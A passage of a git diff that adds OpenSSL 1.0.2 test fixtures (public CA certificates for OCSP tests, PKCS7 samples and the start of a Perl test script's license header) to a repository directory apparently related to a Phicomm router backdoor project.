+MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG
+A1UEBhMCVVMxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
+b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw
+MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAlVTMRkwFwYDVQQKExBHbG9i
+YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT
+aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ
+jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp
+xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp
+1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG
+snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ
+U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8
+9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E
+BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B
+AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz
+yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE
+38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP
+AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad
+DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME
+HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_D3_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_D3_Issuer_Root.pem
new file mode 100644
index 0000000..764797a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_D3_Issuer_Root.pem
@@ -0,0 +1,41 @@
+-----BEGIN CERTIFICATE-----
+MIIHPTCCBSWgAwIBAgIBADANBgkqhkiG9w0BAQQFADB5MRAwDgYDVQQKEwdUZXN0
+IENBMR4wHAYDVQQLExVodHRwOi8vd3d3LmNhY2VydC5vcmcxIjAgBgNVBAMTGUNB
+IENlcnQgU2lnbmluZyBBdXRob3JpdHkxITAfBgkqhkiG9w0BCQEWEnN1cHBvcnRA
+Y2FjZXJ0Lm9yZzAeFw0wMzAzMzAxMjI5NDlaFw0zMzAzMjkxMjI5NDlaMHkxEDAO
+BgNVBAoTB1Rlc3QgQ0ExHjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEi
+MCAGA1UEAxMZQ0EgQ2VydCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJ
+ARYSc3VwcG9ydEBjYWNlcnQub3JnMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
+CgKCAgEAziLA4kZ97DYoB1CW8qAzQIxL8TtmPzHlawI229Z89vGIj053NgVBlfkJ
+8BLPRoZzYLdufujAWGSuzbCtRRcMY/pnCujW0r8+55jE8Ez64AO7NV1sId6eINm6
+zWYyN3L69wj1x81YyY7nDl7qPv4coRQKFWyGhFtkZip6qUtTefWIonvuLwphK42y
+fk1WpRPs6tqSnqxEQR5YYGUFZvjARL3LlPdCfgv3ZWiYUQXw8wWRBB0bF4LsyFe7
+w2t6iPGwcswlWyCR7BYCEo8y6RcYSNDHBS4CMEK4JZwFaz+qOqfrU0j36NK2B5jc
+G8Y0f3/JHIJ6BVgrCFvzOKKrF11myZjXnhCLotLddJr3cQxyYN/Nb5gznZY0dj4k
+epKwDpUeb+agRThHqtdB7Uq3EvbXG4OKDy7YCbZZ16oE/9KTfWgu3YtLq1i6L43q
+laegw1SJpfvbi1EinbLDvhG+LJGGi5Z4rSDTii8aP8bQUWWHIbEZAWV/RRyH9XzQ
+QUxPKZgh/TMfdQwEUfoZd9vUFBzugcMd9Zi3aQaRIt0AUMyBMawSB3s42mhb5ivU
+fslfrejrckzzAeVLIL+aplfKkQABi6F1ITe1Yw1nPkZPcCBnzsXWWdsC4PDSy826
+YreQQejdIOQpvGQpQsgi3Hia/0PsmBsJUUtaWsJx8cTLc6nloQsCAwEAAaOCAc4w
+ggHKMB0GA1UdDgQWBBQWtTIb1Mfz4OaO873SsDrusjkY0TCBowYDVR0jBIGbMIGY
+gBQWtTIb1Mfz4OaO873SsDrusjkY0aF9pHsweTEQMA4GA1UEChMHUm9vdCBDQTEe
+MBwGA1UECxMVaHR0cDovL3d3dy5jYWNlcnQub3JnMSIwIAYDVQQDExlDQSBDZXJ0
+IFNpZ25pbmcgQXV0aG9yaXR5MSEwHwYJKoZIhvcNAQkBFhJzdXBwb3J0QGNhY2Vy
+dC5vcmeCAQAwDwYDVR0TAQH/BAUwAwEB/zAyBgNVHR8EKzApMCegJaAjhiFodHRw
+czovL3d3dy5jYWNlcnQub3JnL3Jldm9rZS5jcmwwMAYJYIZIAYb4QgEEBCMWIWh0
+dHBzOi8vd3d3LmNhY2VydC5vcmcvcmV2b2tlLmNybDA0BglghkgBhvhCAQgEJxYl
+aHR0cDovL3d3dy5jYWNlcnQub3JnL2luZGV4LnBocD9pZD0xMDBWBglghkgBhvhC
+AQ0ESRZHVG8gZ2V0IHlvdXIgb3duIGNlcnRpZmljYXRlIGZvciBGUkVFIGhlYWQg
+b3ZlciB0byBodHRwOi8vd3d3LmNhY2VydC5vcmcwDQYJKoZIhvcNAQEEBQADggIB
+ACjH7pyCArpcgBLKNQodgW+JapnM8mgPf6fhjViVPr3yBsOQWqy1YPaZQwGjiHCc
+nWKdpIevZ1gNMDY75q1I08t0AoZxPuIrA2jxNGJARjtT6ij0rPtmlVOKTV39O9lg
+18p5aTuxZZKmxoGCXJzN600BiqXfEVWqFcofN8CCmHBh22p8lqOOLlQ+TyGpkO/c
+gr/c6EWtTZBzCDyUZbAEmXZ/4rzCahWqlwQ3JNgelE5tDlG+1sSPypZt90Pf6DBl
+Jzt7u0NDY8RD97LsaMzhGY4i+5jhe1o+ATc7iwiwovOVThrLm82asduycPAtStvY
+sONvRUgzEv/+PDIqVPfE94rwiCPCR/5kenHA0R6mY7AHfqQv0wGP3J8rtsYIqQ+T
+SCX8Ev2fQtzzxD72V7DX3WnRBnc0CkvSyqD/HMaMyRa+xMwyN2hzXwj7UfdJUzYF
+CpUCTPJ5GhD22Dp1nPMd8aINcGeGG7MW9S/lpOt5hvk9C8JzC6WZrG/8Z7jlLwum
+GCSNe9FINSkYQKyTYOGWhlC0elnYjyELn8+CkcY7v2vcB5G5l1YjqrZslMZIBjzk
+zk6q5PYvCdxTby78dOs6Y5nCpqyJvKeyRKANihDjbPIky/qbn3BHLt4Ui9SyIAmW
+omTxJBzcoTWcFbLUvFUufQb1nA5V9FrWk9p2rSVzTMVD
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_ND1_Issuer_ICA.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_ND1_Issuer_ICA.pem
new file mode 100644
index 0000000..06b6908
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_ND1_Issuer_ICA.pem
@@ -0,0 +1,29 @@
+-----BEGIN CERTIFICATE-----
+MIIFBjCCA+6gAwIBAgIQEaO00OyNt3+doM1dLVEvQjANBgkqhkiG9w0BAQUFADCB
+gTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G
+A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxJzAlBgNV
+BAMTHkNPTU9ETyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xMDA1MjQwMDAw
+MDBaFw0yMDA1MzAxMDQ4MzhaMIGOMQswCQYDVQQGEwJVUzEbMBkGA1UECBMSR3Jl
+YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01P
+RE8gQ0EgTGltaXRlZDE0MDIGA1UEAxMrQ09NT0RPIEV4dGVuZGVkIFZhbGlkYXRp
+b24gU2VjdXJlIFNlcnZlciBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
+ggEBAMxKljPNJY1n7iiWN4dG8PYEooR/U6qW5h+xAhxu7X0h1Nc8HqLYaS+ot/Wi
+7WRYZOFEZTZJQSABjTsT4gjzDPJXOZM3txyTRIOOvy3xoQV12m7ue28b6naDKHRK
+HCvT9cQDcpOvhs4JjDx11MkKL3Lzrb0OMDyEoXMfAyUUpY/D1vS15N2GevUZumjy
+hVSiMBHK0ZLLO3QGEqA3q2rYVBHfbJoWlLm0p2XGdC0x801S6VVRn8s+oo12mHDS
+b6ZlRS8bhbtbbfnywARmE4R6nc4n2PREnr+svpnba0/bWCGwiSe0jzLWS15ykV7f
+BZ3ZSS/0tm9QH3XLgJ3m0+TR8tMCAwEAAaOCAWkwggFlMB8GA1UdIwQYMBaAFAtY
+5YvGTBU3pECpMKkhvkc2Wlb/MB0GA1UdDgQWBBSIRFH/UCppXi2I9CG62Qzyzsvq
+fDAOBgNVHQ8BAf8EBAMCAQYwEgYDVR0TAQH/BAgwBgEB/wIBADA+BgNVHSAENzA1
+MDMGBFUdIAAwKzApBggrBgEFBQcCARYdaHR0cHM6Ly9zZWN1cmUuY29tb2RvLmNv
+bS9DUFMwSQYDVR0fBEIwQDA+oDygOoY4aHR0cDovL2NybC5jb21vZG9jYS5jb20v
+Q09NT0RPQ2VydGlmaWNhdGlvbkF1dGhvcml0eS5jcmwwdAYIKwYBBQUHAQEEaDBm
+MD4GCCsGAQUFBzAChjJodHRwOi8vY3J0LmNvbW9kb2NhLmNvbS9DT01PRE9BZGRU
+cnVzdFNlcnZlckNBLmNydDAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuY29tb2Rv
+Y2EuY29tMA0GCSqGSIb3DQEBBQUAA4IBAQCaQ7+vpHJezX1vf/T8PYy7cOYe3QT9
+P9ydn7+JdpvyhjH8f7PtKpFTLOKqsOPILHH3FYojHPFpLoH7sbxiC6saVBzZIl40
+TKX2Iw9dej3bQ81pfhc3Us1TocIR1FN4J2TViUFNFlW7kMvw2OTd3dMJZEgo/zIj
+hC+Me1UvzymINzR4DzOq/7fylqSbRIC1vmxWVKukgZ4lGChUOn8sY89ZIIwYazgs
+tN3t40DeDDYlV5rA0WCeXgNol64aO+pF11GZSe5EWVYLXrGPaOqKnsrSyaADfnAl
+9DLJTlCDh6I0SD1PNXf82Ijq9n0ezkO21cJqfjhmY03n7jLvDyToKmf6
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_ND2_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_ND2_Issuer_Root.pem
new file mode 100644
index 0000000..1b46fcf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_ND2_Issuer_Root.pem
@@ -0,0 +1,23 @@
+-----BEGIN CERTIFICATE-----
+MIID0DCCArigAwIBAgIQIKTEf93f4cdTYwcTiHdgEjANBgkqhkiG9w0BAQUFADCB
+gTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G
+A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxJzAlBgNV
+BAMTHkNPTU9ETyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xMTAxMDEwMDAw
+MDBaFw0zMDEyMzEyMzU5NTlaMIGBMQswCQYDVQQGEwJVUzEbMBkGA1UECBMSR3Jl
+YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01P
+RE8gQ0EgTGltaXRlZDEnMCUGA1UEAxMeQ09NT0RPIENlcnRpZmljYXRpb24gQXV0
+aG9yaXR5MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0ECLi3LjkRv3
+UcEbVASY06m/weaKXTuH+7uIzg3jLz8GlvCiKVCZrts7oVewdFFxze1CkU1B/qnI
+2GqGd0S7WWaXUF601CxwRM/aN5VCaTwwxHGzUvAhTaHYujl8HJ6jJJ3ygxaYqhZ8
+Q5sVW7euNJH+1GImGEaaP+vB+fGQV+useg2L23IwambV4EajcNxo2f8ESIl33rXp
++2dtQem8Ob0y2WIC8bGoPW43nOIv4tOiJovGuFVDiOEjPqXSJDlqR6sA1KGzqSX+
+DT+nHbrTUcELpNqsOO9VUCQFZUaTNE8tja3G1CEZ0o7KBWFxB3NH5YoZEr0ETc5O
+nKVIrLsm9wIDAQABo0IwQDAdBgNVHQ4EFgQUC1jli8ZMFTekQKkwqSG+RzZaVv8w
+DgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEFBQAD
+ggEBAC/JxBwHO89hAgCx2SFRdXIDMLDEFh9sAIsQrK/xR9SuEDwMGvjUk2ysEDd8
+t6aDZK3N3w6HM503sMZ7OHKx8xoOo/lVem0DZgMXlUrxsXrfViEGQo+x06iF3u6X
+HWLrp+cxEmbDD6ZLLkGC9/3JG6gbr+48zuOcrigHoSybJMIPIyaDMouGDx8rEkYl
+Fo92kANr3ryqImhrjKGsKxE5pttwwn1y6TPn/CbxdFqR5p2ErPioBhlG5qfpqjQi
+pKGfeq23sqSaM4hxAjwu1nqyH6LKwN0vEJT9s4yEIHlG1QXUEOTS22RPuFvuG8Ug
+R1uUq27UlTMdphVx8fiUylQ5PsE=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_ND3_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_ND3_Issuer_Root.pem
new file mode 100644
index 0000000..4d1f454
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_ND3_Issuer_Root.pem
@@ -0,0 +1,25 @@
+-----BEGIN CERTIFICATE-----
+MIIENjCCAx6gAwIBAgIBATANBgkqhkiG9w0BAQUFADBvMQswCQYDVQQGEwJTRTEU
+MBIGA1UEChMLQWRkVHJ1c3QgQUIxJjAkBgNVBAsTHUFkZFRydXN0IEV4dGVybmFs
+IFRUUCBOZXR3b3JrMSIwIAYDVQQDExlBZGRUcnVzdCBFeHRlcm5hbCBDQSBSb290
+MB4XDTAwMDUzMDEwNDgzOFoXDTIwMDUzMDEwNDgzOFowbzELMAkGA1UEBhMCVVMx
+FDASBgNVBAoTC0FkZFRydXN0IEFCMSYwJAYDVQQLEx1BZGRUcnVzdCBFeHRlcm5h
+bCBUVFAgTmV0d29yazEiMCAGA1UEAxMZQWRkVHJ1c3QgRXh0ZXJuYWwgQ0EgUm9v
+dDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALf3GjPm8gAELTngTlvt
+H7xsD821+iO2zt6bETOXpClMfZOfvUq8k+0DGuOPz+VtUFrWlymUWoCwSXrbLpX9
+uMq/NzgtHj6RQa1wVsfwTz/oMp50ysiQVOnGXw94nZpAPA6sYapeFI+eh6FqUNzX
+mk6vBbOmcZSccbNQYArHE504B4YCqOmoaSYYkKtMsE8jqzpPhNjfzp/haW+710LX
+a0Tkx63ubUFfclpxCDezeWWkWaCUN/cALw3CknLa0Dhy2xSoRcRdKn23tNbE7qzN
+E0S3ySvdQwAl+mG5aWpYIxG3pzOPVnVZ9c0p10a3CitlttNCbxWyuHv77+ldU9U0
+WicCAwEAAaOB3DCB2TAdBgNVHQ4EFgQUrb2YejS0Jvf6xCZU7wO94CTLVBowCwYD
+VR0PBAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wgZkGA1UdIwSBkTCBjoAUrb2YejS0
+Jvf6xCZU7wO94CTLVBqhc6RxMG8xCzAJBgNVBAYTAlNFMRQwEgYDVQQKEwtBZGRU
+cnVzdCBBQjEmMCQGA1UECxMdQWRkVHJ1c3QgRXh0ZXJuYWwgVFRQIE5ldHdvcmsx
+IjAgBgNVBAMTGUFkZFRydXN0IEV4dGVybmFsIENBIFJvb3SCAQEwDQYJKoZIhvcN
+AQEFBQADggEBALCb4IUlwtYj4g+WBpKdQZic2YR5gdkeWxQHIzZlj7DYd7usQWxH
+YINRsPkyPef89iYTx4AWpb9a/IfPeHmJIZriTAcKhjW88t5RxNKWt9x+Tu5w/Rw5
+6wwCURQtjr0W4MHfRnXnJK3s9EK0hZNwEGe6nQY1ShjTK3rMUUKhemPR5ruhxSvC
+Nr4TDea9Y355e6cJDUCrat2PisP29owaQgVR1EX1n6diIWgVIEM8med8vSTYqZEX
+c4g/VhsxOBi0cQ+azcgOno4uG+GMmIPLHzHxREzGBHNJdmAPx/i9F4BrLunMTA5a
+mnkPIAou1Z5jJh5VkpTYghdae9C8x49OhgQ=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/pkcs7-1.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/pkcs7-1.pem
new file mode 100644
index 0000000..c47b27a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/pkcs7-1.pem
@@ -0,0 +1,15 @@
+-----BEGIN PKCS7-----
+MIICUAYJKoZIhvcNAQcCoIICQTCCAj0CAQExDjAMBggqhkiG9w0CAgUAMCgGCSqG
+SIb3DQEHAaAbBBlFdmVyeW9uZSBnZXRzIEZyaWRheSBvZmYuoIIBXjCCAVowggEE
+AgQUAAApMA0GCSqGSIb3DQEBAgUAMCwxCzAJBgNVBAYTAlVTMR0wGwYDVQQKExRF
+eGFtcGxlIE9yZ2FuaXphdGlvbjAeFw05MjA5MDkyMjE4MDZaFw05NDA5MDkyMjE4
+MDVaMEIxCzAJBgNVBAYTAlVTMR0wGwYDVQQKExRFeGFtcGxlIE9yZ2FuaXphdGlv
+bjEUMBIGA1UEAxMLVGVzdCBVc2VyIDEwWzANBgkqhkiG9w0BAQEFAANKADBHAkAK
+ZnkdxpiBaN56t3QZu3+wwAHGJxAnAHUUKULhmo2MUdBTs+N4Kh3l3Fr06+mUaBcB
+FKHf5nzcmpr1XWVWILurAgMBAAEwDQYJKoZIhvcNAQECBQADQQBFGqHhqncgSl/N
+9XYGnQL3MsJvNnsNV4puZPOakR9Hld8JlDQFEaDR30ogsmp3TMrvdfxpLlTCoZN8
+BxEmnZsWMYGbMIGYAgEBMDQwLDELMAkGA1UEBhMCVVMxHTAbBgNVBAoTFEV4YW1w
+bGUgT3JnYW5pemF0aW9uAgQUAAApMAwGCCqGSIb3DQICBQAwDQYJKoZIhvcNAQEB
+BQAEQAX6aoEvx9+L9PJUJQngPoRuEbnGIL4gCe+0QO+8xmkhaZSsBPNBtX0FIC1C
+j7Kie1x339mxW/w9VZNTUDQQweHh
+-----END PKCS7-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/pkcs7.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/pkcs7.pem
new file mode 100644
index 0000000..d55c60b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/pkcs7.pem
@@ -0,0 +1,54 @@
+     MIAGCSqGSIb3DQEHAqCAMIACAQExADCABgkqhkiG9w0BBwEAAKCAMIIE+DCCBGGg
+     AwIBAgIQaGSF/JpbS1C223+yrc+N1DANBgkqhkiG9w0BAQQFADBiMREwDwYDVQQH
+     EwhJbnRlcm5ldDEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xNDAyBgNVBAsTK1Zl
+     cmlTaWduIENsYXNzIDEgQ0EgLSBJbmRpdmlkdWFsIFN1YnNjcmliZXIwHhcNOTYw
+     ODEyMDAwMDAwWhcNOTYwODE3MjM1OTU5WjCCASAxETAPBgNVBAcTCEludGVybmV0
+     MRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjE0MDIGA1UECxMrVmVyaVNpZ24gQ2xh
+     c3MgMSBDQSAtIEluZGl2aWR1YWwgU3Vic2NyaWJlcjE3MDUGA1UECxMuRGlnaXRh
+     bCBJRCBDbGFzcyAxIC0gU01JTUUgVmVyaVNpZ24sIEluYy4gVEVTVDFGMEQGA1UE
+     CxM9d3d3LnZlcmlzaWduLmNvbS9yZXBvc2l0b3J5L0NQUyBJbmNvcnAuIGJ5IFJl
+     Zi4sTElBQi5MVEQoYyk5NjEZMBcGA1UEAxMQQWxleGFuZHJlIERlYWNvbjEgMB4G
+     CSqGSIb3DQEJARYRYWxleEB2ZXJpc2lnbi5jb20wWzANBgkqhkiG9w0BAQEFAANK
+     ADBHAkAOy7xxCAIkOfuIA2LyRpxgKlDORl8htdXYhF5iBGUx1GYaK6KF+bK/CCI0
+     l4j2OfWGFBUrwGoWqxTNcWgTfMzRAgMBAAGjggIyMIICLjAJBgNVHRMEAjAAMIIC
+     HwYDVR0DBIICFjCCAhIwggIOMIICCgYLYIZIAYb4RQEHAQEwggH5FoIBp1RoaXMg
+     Y2VydGlmaWNhdGUgaW5jb3Jwb3JhdGVzIGJ5IHJlZmVyZW5jZSwgYW5kIGl0cyB1
+     c2UgaXMgc3RyaWN0bHkgc3ViamVjdCB0bywgdGhlIFZlcmlTaWduIENlcnRpZmlj
+     YXRpb24gUHJhY3RpY2UgU3RhdGVtZW50IChDUFMpLCBhdmFpbGFibGUgYXQ6IGh0
+     dHBzOi8vd3d3LnZlcmlzaWduLmNvbS9DUFM7IGJ5IEUtbWFpbCBhdCBDUFMtcmVx
+     dWVzdHNAdmVyaXNpZ24uY29tOyBvciBieSBtYWlsIGF0IFZlcmlTaWduLCBJbmMu
+     LCAyNTkzIENvYXN0IEF2ZS4sIE1vdW50YWluIFZpZXcsIENBIDk0MDQzIFVTQSBU
+     ZWwuICsxICg0MTUpIDk2MS04ODMwIENvcHlyaWdodCAoYykgMTk5NiBWZXJpU2ln
+     biwgSW5jLiAgQWxsIFJpZ2h0cyBSZXNlcnZlZC4gQ0VSVEFJTiBXQVJSQU5USUVT
+     IERJU0NMQUlNRUQgYW5kIExJQUJJTElUWSBMSU1JVEVELqAOBgxghkgBhvhFAQcB
+     AQGhDgYMYIZIAYb4RQEHAQECMCwwKhYoaHR0cHM6Ly93d3cudmVyaXNpZ24uY29t
+     L3JlcG9zaXRvcnkvQ1BTIDANBgkqhkiG9w0BAQQFAAOBgQAimWMGQwwwxk+b3KAL
+     HlSWXtU7LWHe29CEG8XeVNTvrqs6SBqT7OoENOkGxpfdpVgZ3Qw2SKjxDvbvpfSF
+     slsqcxWSgB/hWuaVuZCkvTw/dYGGOxkTJGxvDCfl1PZjX4dKbatslsi9Z9HpGWT7
+     ttItRwKqcBKgmCJvKi1pGWED0zCCAnkwggHioAMCAQICEDURpVKQb+fQKaRAGdQR
+     /D4wDQYJKoZIhvcNAQECBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlT
+     aWduLCBJbmMuMTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRp
+     ZmljYXRpb24gQXV0aG9yaXR5MB4XDTk2MDYyNzAwMDAwMFoXDTk3MDYyNzIzNTk1
+     OVowYjERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMu
+     MTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0gSW5kaXZpZHVhbCBTdWJz
+     Y3JpYmVyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC2FKbPTdAFDdjKI9Bv
+     qrQpkmOOLPhvltcunXZLEbE2jVfJw/0cxrr+Hgi6M8qV6r7jW80GqLd5HUQq7XPy
+     sVKDaBBwZJHXPmv5912dFEObbpdFmIFH0S3L3bty10w/cariQPJUObwW7s987Lrb
+     P2wqsxaxhhKdrpM01bjV0Pc+qQIDAQABozMwMTAPBgNVHRMECDAGAQH/AgEBMAsG
+     A1UdDwQEAwIBBjARBglghkgBhvhCAQEEBAMCAgQwDQYJKoZIhvcNAQECBQADgYEA
+     KeXHoBmnbxRCgk0jM9e9mDppdxpsipIna/J8DOHEUuD4nONAr4+xOg73SBl026n7
+     Bk55A2wvAMGo7+kKTZ+rHaFDDcmq4O+rzFri2RIOeGAncj1IcGptAQhvXoIhFMG4
+     Jlzg1KlHZHqy7D3jex78zcSU7kKOu8f5tAX1jC3+sToAAKGAMIIBJzCBkTANBgkq
+     hkiG9w0BAQIFADBiMREwDwYDVQQHEwhJbnRlcm5ldDEXMBUGA1UEChMOVmVyaVNp
+     Z24sIEluYy4xNDAyBgNVBAsTK1ZlcmlTaWduIENsYXNzIDEgQ0EgLSBJbmRpdmlk
+     dWFsIFN1YnNjcmliZXIXDTk2MDcwMTE3MzA0MFoXDTk3MDcwMTAwMDAwMFowDQYJ
+     KoZIhvcNAQECBQADgYEAGLuQ6PX8A7AiqBEtWzYtl6lZNSDI0bR5YUo+D2Jzkw30
+     dxQnJSbKXEc6XYuzAW5HvrzATXu5c19WWPT4cRDwmjH71i9QcDysWwf/wE0qGTiW
+     I3tQT0I5VGh7jIJD07nlBw3R4Xl8dH9kr85JsWinqDH5YKpIo9o8knY5n7+qjOow
+     ggEkMIGOMA0GCSqGSIb3DQEBAgUAMF8xCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5W
+     ZXJpU2lnbiwgSW5jLjE3MDUGA1UECxMuQ2xhc3MgMSBQdWJsaWMgUHJpbWFyeSBD
+     ZXJ0aWZpY2F0aW9uIEF1dGhvcml0eRcNOTYwNzE2MjMxMTI5WhcNOTYwODE1MDAw
+     MDAwWjANBgkqhkiG9w0BAQIFAAOBgQAXsLE4vnsY6sY67QrmWec7iaU2ehzxanEK
+     /9wKHZNuhlNzk+qGZZw2evxfUe2OaRbYpl8zuZvhK9BHD3ad14OSe9/zx5hOPgP/
+     DQXt6R4R8Q/1JheBrolrgbavjvI2wKS8/Psp2prBrkF4T48+AKRmS8Zzh1guxgvP
+     b+xSu/jH0gAAMYAAAAAAAAAAAA==
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/pkits-test.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/pkits-test.pl
new file mode 100644
index 0000000..5c6b89f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/pkits-test.pl
@@ -0,0 +1,949 @@
+# test/pkits-test.pl
+# Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+# project.
+#
+# ====================================================================
+# Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions
+# are met:
+#
+# 1. Redistributions of source code must retain the above copyright
+#    notice, this list of conditions and the following disclaimer.
+#
+# 2. Redistributions in binary form must reproduce the above copyright
+#    notice, this list of conditions and the following disclaimer in
+#    the documentation and/or other materials provided with the
+#    distribution.
+#
+# 3. All advertising materials mentioning features or use of this
+#    software must display the following acknowledgment:
+#    "This product includes software developed by the OpenSSL Project
+#    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+#
+# 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+#    endorse or promote products derived from this software without
+#    prior written permission. For written permission, please contact
+#    licensing@OpenSSL.org.
+#
+# 5. Products derived from this software may not be called "OpenSSL"
+#    nor may "OpenSSL" appear in their names without prior written
+#    permission of the OpenSSL Project.
+#
+# 6. Redistributions of any form whatsoever must retain the following
+#    acknowledgment:
+#    "This product includes software developed by the OpenSSL Project
+#    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+#
+# THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+# EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+# PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+# ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
